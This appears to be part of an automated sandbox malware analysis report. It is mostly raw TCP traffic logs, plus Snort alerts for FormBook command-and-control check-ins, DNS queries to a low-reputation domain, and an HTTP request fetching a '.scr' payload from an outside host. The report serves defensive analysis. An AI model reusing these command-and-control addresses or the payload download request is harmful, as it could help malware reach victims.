Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 66.96.161.166:80
Source: global traffic	TCP traffic: 66.96.161.166:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 66.96.161.166:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 66.96.161.166:80
Source: global traffic	TCP traffic: 66.96.161.166:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 66.96.161.166:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 66.96.161.166:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 66.96.161.166:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 66.96.161.166:80
Source: global traffic	TCP traffic: 66.96.161.166:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
Source: global traffic	TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
Source: global traffic	TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
Source: global traffic	TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
Source: global traffic	TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
Source: global traffic	TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
Source: global traffic	TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
Source: global traffic	TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
Source: global traffic	TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
Source: global traffic	TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
Source: global traffic	TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
Source: global traffic	TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49162 -> 66.96.161.166:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49167 -> 54.38.220.85:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49171 -> 194.9.94.86:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49175 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49179 -> 198.12.241.35:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49183 -> 183.111.183.31:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49187 -> 67.223.117.189:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49191 -> 89.116.109.159:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49195 -> 183.111.183.31:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49199 -> 208.91.197.13:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49203 -> 84.33.215.91:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49207 -> 172.67.182.131:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49211 -> 93.127.187.187:80

Performs DNS queries to domains with low reputation

Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	DNS query: www.99b6q.xyz
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	DNS query: www.99b6q.xyz
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	DNS query: www.99b6q.xyz
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	DNS query: www.99b6q.xyz

Source: unknown

Network traffic detected: IP country count 10

Source: Joe Sandbox View	IP Address: 194.9.94.86 194.9.94.86
Source: Joe Sandbox View	IP Address: 45.33.6.223 45.33.6.223

Source: Joe Sandbox View	ASN Name: LOOPIASE LOOPIASE
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3A01D4A1-178B-4603-9BE4-7DECA3DA952D}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /sharon.scr HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: dukeenergyltd.topConnection: Keep-Alive
